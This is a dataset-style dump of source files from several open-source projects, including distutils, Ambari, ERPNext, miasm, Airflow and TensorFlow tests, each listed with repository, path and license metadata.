repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
thomasrogers03/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/config/messages.py | 119 | 1677 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# These must be in sync with webkit-patch's AbstractQueue.
pass_status = "Pass"
fail_status = "Fail"
retry_status = "Retry"
error_status = "Error"
| bsd-3-clause |
hynnet/openwrt-mt7620 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/root-ralink/usr/lib/python2.7/distutils/emxccompiler.py | 250 | 11931 | """distutils.emxccompiler
Provides the EMXCCompiler class, a subclass of UnixCCompiler that
handles the EMX port of the GNU C compiler to OS/2.
"""
# issues:
#
# * OS/2 insists that DLLs can have names no longer than 8 characters
# We put export_symbols in a def-file, as though the DLL can have
# an arbitrary length name, but truncate the output filename.
#
# * only use OMF objects and use LINK386 as the linker (-Zomf)
#
# * always build for multithreading (-Zmt) as the accompanying OS/2 port
# of Python is only distributed with threads enabled.
#
# tested configurations:
#
# * EMX gcc 2.81/EMX 0.9d fix03
__revision__ = "$Id$"
import os,sys,copy
from distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.file_util import write_file
from distutils.errors import DistutilsExecError, CompileError, UnknownFileError
from distutils import log
class EMXCCompiler (UnixCCompiler):
compiler_type = 'emx'
obj_extension = ".obj"
static_lib_extension = ".lib"
shared_lib_extension = ".dll"
static_lib_format = "%s%s"
shared_lib_format = "%s%s"
res_extension = ".res" # compiled resource file
exe_extension = ".exe"
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
UnixCCompiler.__init__ (self, verbose, dry_run, force)
(status, details) = check_config_h()
self.debug_print("Python's GCC status: %s (details: %s)" %
(status, details))
if status is not CONFIG_H_OK:
self.warn(
"Python's pyconfig.h doesn't seem to support your compiler. " +
("Reason: %s." % details) +
"Compiling may fail because of undefined preprocessor macros.")
(self.gcc_version, self.ld_version) = \
get_versions()
self.debug_print(self.compiler_type + ": gcc %s, ld %s\n" %
(self.gcc_version,
self.ld_version) )
# Hard-code GCC because that's what this is all about.
# XXX optimization, warnings etc. should be customizable.
self.set_executables(compiler='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
compiler_so='gcc -Zomf -Zmt -O3 -fomit-frame-pointer -mprobe -Wall',
linker_exe='gcc -Zomf -Zmt -Zcrtdll',
linker_so='gcc -Zomf -Zmt -Zcrtdll -Zdll')
# want the gcc library statically linked (so that we don't have
# to distribute a version dependent on the compiler we have)
self.dll_libraries=["gcc"]
# __init__ ()
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
if ext == '.rc':
# gcc requires '.rc' compiled to binary ('.res') files !!!
try:
self.spawn(["rc", "-r", src])
except DistutilsExecError, msg:
raise CompileError, msg
else: # for other files use the C-compiler
try:
self.spawn(self.compiler_so + cc_args + [src, '-o', obj] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError, msg
def link (self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
# use separate copies, so we can modify the lists
extra_preargs = copy.copy(extra_preargs or [])
libraries = copy.copy(libraries or [])
objects = copy.copy(objects or [])
# Additional libraries
libraries.extend(self.dll_libraries)
# handle export symbols by creating a def-file
# with executables this only works with gcc/ld as linker
if ((export_symbols is not None) and
(target_desc != self.EXECUTABLE)):
# (The linker doesn't do anything if output is up-to-date.
# So it would probably better to check if we really need this,
# but for this we had to insert some unchanged parts of
# UnixCCompiler, and this is not what we want.)
# we want to put some files in the same directory as the
# object files are, build_temp doesn't help much
# where are the object files
temp_dir = os.path.dirname(objects[0])
# name of dll to give the helper files the same base name
(dll_name, dll_extension) = os.path.splitext(
os.path.basename(output_filename))
# generate the filenames for these files
def_file = os.path.join(temp_dir, dll_name + ".def")
# Generate .def file
contents = [
"LIBRARY %s INITINSTANCE TERMINSTANCE" % \
os.path.splitext(os.path.basename(output_filename))[0],
"DATA MULTIPLE NONSHARED",
"EXPORTS"]
for sym in export_symbols:
contents.append(' "%s"' % sym)
self.execute(write_file, (def_file, contents),
"writing %s" % def_file)
# next add options for def-file and to creating import libraries
# for gcc/ld the def-file is specified as any other object files
objects.append(def_file)
#end: if ((export_symbols is not None) and
# (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")):
# who wants symbols and a many times larger output file
# should explicitly switch the debug mode on
# otherwise we let dllwrap/ld strip the output file
# (On my machine: 10KB < stripped_file < ??100KB
# unstripped_file = stripped_file + XXX KB
# ( XXX=254 for a typical python extension))
if not debug:
extra_preargs.append("-s")
UnixCCompiler.link(self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
None, # export_symbols, we do this in our def-file
debug,
extra_preargs,
extra_postargs,
build_temp,
target_lang)
# link ()
# -- Miscellaneous methods -----------------------------------------
# override the object_filenames method from CCompiler to
# support rc and res-files
def object_filenames (self,
source_filenames,
strip_dir=0,
output_dir=''):
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
(base, ext) = os.path.splitext (os.path.normcase(src_name))
if ext not in (self.src_extensions + ['.rc']):
raise UnknownFileError, \
"unknown file type '%s' (from '%s')" % \
(ext, src_name)
if strip_dir:
base = os.path.basename (base)
if ext == '.rc':
# these need to be compiled to object files
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
# object_filenames ()
# override the find_library_file method from UnixCCompiler
# to deal with file naming/searching differences
def find_library_file(self, dirs, lib, debug=0):
shortlib = '%s.lib' % lib
longlib = 'lib%s.lib' % lib # this form very rare
# get EMX's default library directory search path
try:
emx_dirs = os.environ['LIBRARY_PATH'].split(';')
except KeyError:
emx_dirs = []
for dir in dirs + emx_dirs:
shortlibp = os.path.join(dir, shortlib)
longlibp = os.path.join(dir, longlib)
if os.path.exists(shortlibp):
return shortlibp
elif os.path.exists(longlibp):
return longlibp
# Oops, didn't find it in *any* of 'dirs'
return None
# class EMXCCompiler
# Because these compilers aren't configured in Python's pyconfig.h file by
# default, we should at least warn the user if he is using a unmodified
# version.
CONFIG_H_OK = "ok"
CONFIG_H_NOTOK = "not ok"
CONFIG_H_UNCERTAIN = "uncertain"
def check_config_h():
"""Check if the current Python installation (specifically, pyconfig.h)
appears amenable to building extensions with GCC. Returns a tuple
(status, details), where 'status' is one of the following constants:
CONFIG_H_OK
all is well, go ahead and compile
CONFIG_H_NOTOK
doesn't look good
CONFIG_H_UNCERTAIN
not sure -- unable to read pyconfig.h
'details' is a human-readable string explaining the situation.
Note there are two ways to conclude "OK": either 'sys.version' contains
the string "GCC" (implying that this Python was built with GCC), or the
installed "pyconfig.h" contains the string "__GNUC__".
"""
# XXX since this function also checks sys.version, it's not strictly a
# "pyconfig.h" check -- should probably be renamed...
from distutils import sysconfig
import string
# if sys.version contains GCC then python was compiled with
# GCC, and the pyconfig.h file should be OK
if string.find(sys.version,"GCC") >= 0:
return (CONFIG_H_OK, "sys.version mentions 'GCC'")
fn = sysconfig.get_config_h_filename()
try:
# It would probably better to read single lines to search.
# But we do this only once, and it is fast enough
f = open(fn)
try:
s = f.read()
finally:
f.close()
except IOError, exc:
# if we can't read this file, we cannot say it is wrong
# the compiler will complain later about this file as missing
return (CONFIG_H_UNCERTAIN,
"couldn't read '%s': %s" % (fn, exc.strerror))
else:
# "pyconfig.h" contains an "#ifdef __GNUC__" or something similar
if string.find(s,"__GNUC__") >= 0:
return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn)
else:
return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)
def get_versions():
""" Try to find out the versions of gcc and ld.
If not possible it returns None for it.
"""
from distutils.version import StrictVersion
from distutils.spawn import find_executable
import re
gcc_exe = find_executable('gcc')
if gcc_exe:
out = os.popen(gcc_exe + ' -dumpversion','r')
try:
out_string = out.read()
finally:
out.close()
result = re.search('(\d+\.\d+\.\d+)',out_string)
if result:
gcc_version = StrictVersion(result.group(1))
else:
gcc_version = None
else:
gcc_version = None
# EMX ld has no way of reporting version number, and we use GCC
# anyway - so we can link OMF DLLs
ld_version = None
return (gcc_version, ld_version)
| gpl-2.0 |
arenadata/ambari | ambari-server/src/main/resources/common-services/AMBARI_INFRA/0.1.0/package/scripts/setup_infra_solr.py | 2 | 5041 | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management.core.exceptions import Fail
from resource_management.core.source import InlineTemplate, Template
from resource_management.core.resources.system import Directory, File
from resource_management.libraries.functions.decorator import retry
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions import solr_cloud_util
def setup_infra_solr(name = None):
import params
if name == 'server':
Directory([params.infra_solr_log_dir, params.infra_solr_piddir,
params.infra_solr_datadir, params.infra_solr_data_resources_dir],
mode=0755,
cd_access='a',
create_parents=True,
owner=params.infra_solr_user,
group=params.user_group
)
Directory([params.solr_dir, params.infra_solr_conf],
mode=0755,
cd_access='a',
owner=params.infra_solr_user,
group=params.user_group,
create_parents=True,
recursive_ownership=True
)
File(params.infra_solr_log,
mode=0644,
owner=params.infra_solr_user,
group=params.user_group,
content=''
)
File(format("{infra_solr_conf}/infra-solr-env.sh"),
content=InlineTemplate(params.solr_env_content),
mode=0755,
owner=params.infra_solr_user,
group=params.user_group
)
File(format("{infra_solr_datadir}/solr.xml"),
content=InlineTemplate(params.solr_xml_content),
owner=params.infra_solr_user,
group=params.user_group
)
File(format("{infra_solr_conf}/log4j.properties"),
content=InlineTemplate(params.solr_log4j_content),
owner=params.infra_solr_user,
group=params.user_group
)
custom_security_json_location = format("{infra_solr_conf}/custom-security.json")
File(custom_security_json_location,
content=InlineTemplate(params.infra_solr_security_json_content),
owner=params.infra_solr_user,
group=params.user_group,
mode=0640
)
jaas_file = params.infra_solr_jaas_file if params.security_enabled else None
url_scheme = 'https' if params.infra_solr_ssl_enabled else 'http'
create_ambari_solr_znode()
security_json_file_location = custom_security_json_location \
if params.infra_solr_security_json_content and str(params.infra_solr_security_json_content).strip() \
else format("{infra_solr_conf}/security.json") # security.json file to upload
if params.security_enabled:
File(format("{infra_solr_jaas_file}"),
content=Template("infra_solr_jaas.conf.j2"),
owner=params.infra_solr_user)
File(format("{infra_solr_conf}/security.json"),
content=Template("infra-solr-security.json.j2"),
owner=params.infra_solr_user,
group=params.user_group,
mode=0640)
solr_cloud_util.set_cluster_prop(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
java64_home=params.java64_home,
prop_name="urlScheme",
prop_value=url_scheme,
jaas_file=jaas_file
)
solr_cloud_util.setup_kerberos_plugin(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
jaas_file=jaas_file,
java64_home=params.java64_home,
secure=params.security_enabled,
security_json_location=security_json_file_location
)
if params.security_enabled:
solr_cloud_util.secure_solr_znode(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
jaas_file=jaas_file,
java64_home=params.java64_home,
sasl_users_str=params.infra_solr_sasl_user
)
elif name == 'client':
solr_cloud_util.setup_solr_client(params.config)
else :
raise Fail('Nor client or server were selected to install.')
@retry(times=30, sleep_time=5, err_class=Fail)
def create_ambari_solr_znode():
import params
solr_cloud_util.create_znode(
zookeeper_quorum=params.zookeeper_quorum,
solr_znode=params.infra_solr_znode,
java64_home=params.java64_home,
retry=30, interval=5) | apache-2.0 |
alqfahad/odoo | addons/fetchmail/__init__.py | 437 | 1120 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import fetchmail
import res_config
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
MobinRanjbar/hue | desktop/core/ext-py/South-1.0.2/south/introspection_plugins/geodjango.py | 153 | 1286 | """
GeoDjango introspection rules
"""
import django
from django.conf import settings
from south.modelsinspector import add_introspection_rules
has_gis = "django.contrib.gis" in settings.INSTALLED_APPS
if has_gis:
# Alright,import the field
from django.contrib.gis.db.models.fields import GeometryField
# Make some introspection rules
if django.VERSION[0] == 1 and django.VERSION[1] >= 1:
# Django 1.1's gis module renamed these.
rules = [
(
(GeometryField, ),
[],
{
"srid": ["srid", {"default": 4326}],
"spatial_index": ["spatial_index", {"default": True}],
"dim": ["dim", {"default": 2}],
"geography": ["geography", {"default": False}],
},
),
]
else:
rules = [
(
(GeometryField, ),
[],
{
"srid": ["_srid", {"default": 4326}],
"spatial_index": ["_index", {"default": True}],
"dim": ["_dim", {"default": 2}],
},
),
]
# Install them
add_introspection_rules(rules, ["^django\.contrib\.gis"]) | apache-2.0 |
rcatwood/Savu | savu/plugins/loaders/image_loader.py | 1 | 3329 | # Copyright 2014 Diamond Light Source Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: temp_loader
:platform: Unix
:synopsis: A class for loading standard tomography data in a variety of
formats.
.. moduleauthor:: Nicola Wadeson <[email protected]>
"""
import h5py
import tempfile
import numpy as np
from savu.plugins.base_loader import BaseLoader
from savu.plugins.utils import register_plugin
@register_plugin
class ImageLoader(BaseLoader):
"""
A class to load tomography data from a Nexus file
:param image_type: Type of image. Choose from 'FabIO'. Default: 'FabIO'.
:param angles: A python statement to be evaluated or a file. Default: None.
:param frame_dim: Which dimension requires stitching? Default: 0.
"""
def __init__(self, name='ImageLoader'):
super(ImageLoader, self).__init__(name)
def setup(self):
exp = self.exp
data_obj = exp.create_data_object('in_data', 'tomo')
rot = 0
detY = 1
detX = 2
data_obj.set_axis_labels('rotation_angle.degrees',
'detector_y.pixel',
'detector_x.pixel')
data_obj.add_pattern('PROJECTION', core_dir=(detX, detY),
slice_dir=(rot,))
data_obj.add_pattern('SINOGRAM', core_dir=(detX, rot),
slice_dir=(detY,))
dtype = self.parameters['image_type']
mod = __import__('savu.data.data_structures.data_type', fromlist=dtype)
clazz = getattr(mod, dtype)
path = exp.meta_data.get_meta_data("data_file")
data_obj.data = clazz(path, data_obj, [self.parameters['frame_dim']])
self.set_rotation_angles(data_obj)
# dummy file
filename = path.split('/')[-1] + '.h5'
data_obj.backing_file = \
h5py.File(tempfile.mkdtemp() + '/' + filename, 'a')
data_obj.set_shape(data_obj.data.get_shape())
self.set_data_reduction_params(data_obj)
def set_rotation_angles(self, data_obj):
angles = self.parameters['angles']
if angles is None:
angles = np.linspace(0, 180, data_obj.data.get_shape()[0])
else:
try:
exec("angles = " + angles)
except:
try:
angles = np.loadtxt(angles)
except:
raise Exception('Cannot set angles in loader.')
n_angles = len(angles)
data_angles = data_obj.data.get_shape()[0]
if data_angles is not n_angles:
raise Exception("The number of angles %s does not match the data "
"dimension length %s", n_angles, data_angles)
data_obj.meta_data.set_meta_data("rotation_angle", angles)
| gpl-3.0 |
courtarro/gnuradio | gr-channels/python/channels/__init__.py | 54 | 1350 | #
# Copyright 2012-2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
'''
Blocks for channel models and related functions.
'''
import os
try:
from channels_swig import *
except ImportError:
dirname, filename = os.path.split(os.path.abspath(__file__))
__path__.append(os.path.join(dirname, "..", "..", "swig"))
from channels_swig import *
# Blocks for Hardware Impairments
from amp_bal import *
from conj_fs_iqcorr import *
from distortion_2_gen import *
from distortion_3_gen import *
from iqbal_gen import *
from impairments import *
from phase_bal import *
from phase_noise_gen import *
from quantizer import *
| gpl-3.0 |
suyashphadtare/test | erpnext/hr/doctype/appraisal/appraisal.py | 1 | 2344 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import flt, getdate
from frappe import _
from frappe.model.mapper import get_mapped_doc
from frappe.model.document import Document
from erpnext.hr.utils import set_employee_name
class Appraisal(Document):
def validate(self):
if not self.status:
self.status = "Draft"
set_employee_name(self)
self.validate_dates()
self.validate_existing_appraisal()
self.calculate_total()
def get_employee_name(self):
self.employee_name = frappe.db.get_value("Employee", self.employee, "employee_name")
return self.employee_name
def validate_dates(self):
if getdate(self.start_date) > getdate(self.end_date):
frappe.throw(_("End Date can not be less than Start Date"))
def validate_existing_appraisal(self):
chk = frappe.db.sql("""select name from tabAppraisal where employee=%s
and (status='Submitted' or status='Completed')
and ((start_date>=%s and start_date<=%s)
or (end_date>=%s and end_date<=%s))""",
(self.employee,self.start_date,self.end_date,self.start_date,self.end_date))
if chk:
frappe.throw(_("Appraisal {0} created for Employee {1} in the given date range").format(chk[0][0], self.employee_name))
def calculate_total(self):
total, total_w = 0, 0
for d in self.get('appraisal_details'):
if d.score:
d.score_earned = flt(d.score) * flt(d.per_weightage) / 100
total = total + d.score_earned
total_w += flt(d.per_weightage)
if int(total_w) != 100:
frappe.throw(_("Total weightage assigned should be 100%. It is {0}").format(str(total_w) + "%"))
if frappe.db.get_value("Employee", self.employee, "user_id") != \
frappe.session.user and total == 0:
frappe.throw(_("Total cannot be zero"))
self.total_score = total
def on_submit(self):
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
frappe.db.set(self, 'status', 'Cancelled')
@frappe.whitelist()
def fetch_appraisal_template(source_name, target_doc=None):
target_doc = get_mapped_doc("Appraisal Template", source_name, {
"Appraisal Template": {
"doctype": "Appraisal",
},
"Appraisal Template Goal": {
"doctype": "Appraisal Goal",
}
}, target_doc)
return target_doc
| agpl-3.0 |
chubbymaggie/miasm | example/disasm/callback.py | 2 | 1866 | from miasm2.core.bin_stream import bin_stream_str
from miasm2.core.asmblock import AsmLabel, AsmConstraint, expr_is_label
from miasm2.arch.x86.disasm import dis_x86_32, cb_x86_funcs
def cb_x86_callpop(cur_bloc, symbol_pool, *args, **kwargs):
"""
1000: call 1005
1005: pop
Will give:
1000: push 1005
1005: pop
"""
# Pattern matching
if len(cur_bloc.lines) < 1:
return
## We want to match a CALL, always the last line of a basic block
last_instr = cur_bloc.lines[-1]
if last_instr.name != 'CALL':
return
## The destination must be a label
dst = last_instr.args[0]
if not expr_is_label(dst):
return
## The destination must be the next instruction
if dst.name.offset != last_instr.offset + last_instr.l:
return
# Update instruction instance
last_instr.name = 'PUSH'
# Update next blocks to process in the disassembly engine
cur_bloc.bto.clear()
cur_bloc.add_cst(dst.name.offset, AsmConstraint.c_next, symbol_pool)
# Prepare a tiny shellcode
shellcode = ''.join(["\xe8\x00\x00\x00\x00", # CALL $
"X", # POP EAX
"\xc3", # RET
])
bin_stream = bin_stream_str(shellcode)
mdis = dis_x86_32(bin_stream)
print "Without callback:\n"
blocks = mdis.dis_multibloc(0)
print "\n".join(str(block) for block in blocks)
# Enable callback
cb_x86_funcs.append(cb_x86_callpop)
## Other method:
## mdis.dis_bloc_callback = cb_x86_callpop
# Clean disassembly cache
mdis.job_done.clear()
print "=" * 40
print "With callback:\n"
blocks_after = mdis.dis_multibloc(0)
print "\n".join(str(block) for block in blocks_after)
# Ensure the callback has been called
assert blocks.heads()[0].lines[0].name == "CALL"
assert blocks_after.heads()[0].lines[0].name == "PUSH"
| gpl-2.0 |
apache/airflow | airflow/providers/google/cloud/example_dags/example_gcs_to_bigquery.py | 10 | 2303 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Example DAG using GCSToBigQueryOperator.
"""
import os
from airflow import models
from airflow.providers.google.cloud.operators.bigquery import (
BigQueryCreateEmptyDatasetOperator,
BigQueryDeleteDatasetOperator,
)
from airflow.providers.google.cloud.transfers.gcs_to_bigquery import GCSToBigQueryOperator
from airflow.utils.dates import days_ago
DATASET_NAME = os.environ.get("GCP_DATASET_NAME", 'airflow_test')
TABLE_NAME = os.environ.get("GCP_TABLE_NAME", 'gcs_to_bq_table')
dag = models.DAG(
dag_id='example_gcs_to_bigquery_operator',
start_date=days_ago(2),
schedule_interval=None,
tags=['example'],
)
create_test_dataset = BigQueryCreateEmptyDatasetOperator(
task_id='create_airflow_test_dataset', dataset_id=DATASET_NAME, dag=dag
)
# [START howto_operator_gcs_to_bigquery]
load_csv = GCSToBigQueryOperator(
task_id='gcs_to_bigquery_example',
bucket='cloud-samples-data',
source_objects=['bigquery/us-states/us-states.csv'],
destination_project_dataset_table=f"{DATASET_NAME}.{TABLE_NAME}",
schema_fields=[
{'name': 'name', 'type': 'STRING', 'mode': 'NULLABLE'},
{'name': 'post_abbr', 'type': 'STRING', 'mode': 'NULLABLE'},
],
write_disposition='WRITE_TRUNCATE',
dag=dag,
)
# [END howto_operator_gcs_to_bigquery]
delete_test_dataset = BigQueryDeleteDatasetOperator(
task_id='delete_airflow_test_dataset', dataset_id=DATASET_NAME, delete_contents=True, dag=dag
)
create_test_dataset >> load_csv >> delete_test_dataset
| apache-2.0 |
rabipanda/tensorflow | tensorflow/contrib/metrics/python/kernel_tests/histogram_ops_test.py | 130 | 9577 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for histogram_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.metrics.python.ops import histogram_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class Strict1dCumsumTest(test.TestCase):
"""Test this private function."""
def test_empty_tensor_returns_empty(self):
with self.test_session():
tensor = constant_op.constant([])
result = histogram_ops._strict_1d_cumsum(tensor, 0)
expected = constant_op.constant([])
np.testing.assert_array_equal(expected.eval(), result.eval())
def test_length_1_tensor_works(self):
with self.test_session():
tensor = constant_op.constant([3], dtype=dtypes.float32)
result = histogram_ops._strict_1d_cumsum(tensor, 1)
expected = constant_op.constant([3], dtype=dtypes.float32)
np.testing.assert_array_equal(expected.eval(), result.eval())
def test_length_3_tensor_works(self):
with self.test_session():
tensor = constant_op.constant([1, 2, 3], dtype=dtypes.float32)
result = histogram_ops._strict_1d_cumsum(tensor, 3)
expected = constant_op.constant([1, 3, 6], dtype=dtypes.float32)
np.testing.assert_array_equal(expected.eval(), result.eval())
class AUCUsingHistogramTest(test.TestCase):
def setUp(self):
self.rng = np.random.RandomState(0)
def test_empty_labels_and_scores_gives_nan_auc(self):
with self.test_session():
labels = constant_op.constant([], shape=[0], dtype=dtypes.bool)
scores = constant_op.constant([], shape=[0], dtype=dtypes.float32)
score_range = [0, 1.]
auc, update_op = histogram_ops.auc_using_histogram(labels, scores,
score_range)
variables.local_variables_initializer().run()
update_op.run()
self.assertTrue(np.isnan(auc.eval()))
def test_perfect_scores_gives_auc_1(self):
self._check_auc(
nbins=100,
desired_auc=1.0,
score_range=[0, 1.],
num_records=50,
frac_true=0.5,
atol=0.05,
num_updates=1)
def test_terrible_scores_gives_auc_0(self):
self._check_auc(
nbins=100,
desired_auc=0.0,
score_range=[0, 1.],
num_records=50,
frac_true=0.5,
atol=0.05,
num_updates=1)
def test_many_common_conditions(self):
for nbins in [50]:
for desired_auc in [0.3, 0.5, 0.8]:
for score_range in [[-1, 1], [-10, 0]]:
for frac_true in [0.3, 0.8]:
# Tests pass with atol = 0.03. Moved up to 0.05 to avoid flakes.
self._check_auc(
nbins=nbins,
desired_auc=desired_auc,
score_range=score_range,
num_records=100,
frac_true=frac_true,
atol=0.05,
num_updates=50)
def test_large_class_imbalance_still_ok(self):
# With probability frac_true ** num_records, each batch contains only True
# records. In this case, ~ 95%.
# Tests pass with atol = 0.02. Increased to 0.05 to avoid flakes.
self._check_auc(
nbins=100,
desired_auc=0.8,
score_range=[-1, 1.],
num_records=10,
frac_true=0.995,
atol=0.05,
num_updates=1000)
def test_super_accuracy_with_many_bins_and_records(self):
# Test passes with atol = 0.0005. Increased atol to avoid flakes.
self._check_auc(
nbins=1000,
desired_auc=0.75,
score_range=[0, 1.],
num_records=1000,
frac_true=0.5,
atol=0.005,
num_updates=100)
def _check_auc(self,
nbins=100,
desired_auc=0.75,
score_range=None,
num_records=50,
frac_true=0.5,
atol=0.05,
num_updates=10):
"""Check auc accuracy against synthetic data.
Args:
nbins: nbins arg from contrib.metrics.auc_using_histogram.
desired_auc: Number in [0, 1]. The desired auc for synthetic data.
score_range: 2-tuple, (low, high), giving the range of the resultant
scores. Defaults to [0, 1.].
num_records: Positive integer. The number of records to return.
frac_true: Number in (0, 1). Expected fraction of resultant labels that
will be True. This is just in expectation...more or less may actually
be True.
atol: Absolute tolerance for final AUC estimate.
num_updates: Update internal histograms this many times, each with a new
batch of synthetic data, before computing final AUC.
Raises:
AssertionError: If resultant AUC is not within atol of theoretical AUC
from synthetic data.
"""
score_range = [0, 1.] or score_range
with self.test_session():
labels = array_ops.placeholder(dtypes.bool, shape=[num_records])
scores = array_ops.placeholder(dtypes.float32, shape=[num_records])
auc, update_op = histogram_ops.auc_using_histogram(
labels, scores, score_range, nbins=nbins)
variables.local_variables_initializer().run()
# Updates, then extract auc.
for _ in range(num_updates):
labels_a, scores_a = synthetic_data(desired_auc, score_range,
num_records, self.rng, frac_true)
update_op.run(feed_dict={labels: labels_a, scores: scores_a})
labels_a, scores_a = synthetic_data(desired_auc, score_range, num_records,
self.rng, frac_true)
# Fetch current auc, and verify that fetching again doesn't change it.
auc_eval = auc.eval()
self.assertAlmostEqual(auc_eval, auc.eval(), places=5)
